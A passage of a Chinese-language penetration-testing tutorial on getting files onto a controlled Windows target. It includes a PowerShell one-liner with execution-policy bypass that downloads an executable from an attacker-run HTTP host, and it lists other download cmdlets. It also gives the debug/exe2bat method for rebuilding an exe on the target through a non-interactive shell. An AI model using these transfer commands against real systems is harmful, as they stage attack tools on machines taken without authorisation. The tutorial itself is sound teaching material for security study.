在已经开启http服务的情况下 , 在Windows环境通过命令执行上面这个脚本:

文章插图
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
如果执行的时候遇到“远程服务器返回错误: (403) 已禁止 。” , 那应该是源文件的权限有问题 , 用chmod命令去修改一下权限就可以了 。
执行命令中的一些参数-ExecutionPolicy主要是为了允许本地执行powershell脚本 , 感兴趣的可以通过-Help看一下帮助说明 。
上面的脚本其实可以省略 , 直接在dos界面执行一个长命令:
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.102/whoami.exe', 'D:w.exe')也能达到同样的效果:
文章插图
下载软件
如果本地的执行策略比较严格 , 还是需要加上前面的那些参数 。
还有powershell能使用的模块很多 , 不一定要用System.Net.WebClient , 还有Invoke-WebRequest、Invoke-RestMethod、Start-BitTransfer都能达到同样的效果 。具体使用哪一个模块 , 主要看你控制的机器具体版本 , 一般都是有什么用什么 。
往Windows传文件:debugDebug工具是windows用来做汇编等的一个工具 。在新一点的Windows10已经没有了 , 早一些的WindowsXp还是有的 。如果你的目标机器是Windows10的系统 , 且现有条件让你必须使用debug , 那你必须给目标机器安装一个debug工具 , 这就变成先有鸡还是先有蛋的问题了 。不是很推荐debug这种方式传输软件 。
先将要传递的软件进行压缩:

文章插图
upx -9 whoami.exe
压缩不是必须的 , 只是当文件太大的时候 , debug就无法转换成功 , debug最大只能是64Kb 。
用工具exe2bat.exe转换一下:

文章插图
wine /usr/share/windows-binaries/exe2bat.exe whoami.exe whoami.txt
由于这个工具是Windows环境的 , 所以要通过wine工具来运行 。可以看到输出的文档:

文章插图
cat whoami.txt
在已经获取的非交互模式shell中 , 直接执行输出txt文档里面的内容 , 除最后两行外 。
执行完之后 , 在被控制的目标机器上就会有一个123.hex文件:

文章插图
目标机器生成123.hex
然后执行倒数第二行命令debug<123.hex , Windows就会进行一个汇编的工程 , 最终输出一个1.DLL文件 , 这个文件其实就是原来的exe文件 。最后就是执行最后一行命令copy 1.dll whoami.exe , 将文件还原成exe的可执行文件 。
推荐阅读
- 关于垃圾收集器Parallel Scavenge的GCTimeRatio参数的理解
- 肺癌患者术后有哪些需要注意的
- 肺癌手术后需要注意什么
- 养老保险交15年和25年,退休后的退休金差距大吗?
- 公务员死亡后有哪些待遇?主要有四笔
- 四十岁后,具备这三种力,才能过好后半生
- 后驱更好开,为什么大部分家用车都被设计成前驱?
- 求职|九零,零零后的各位,你们工作能实现双休吗?
- 大雪节气过后御寒的三款食谱推荐
- 阑尾炎不能吃什么 阑尾炎手术后饮食的注意事项
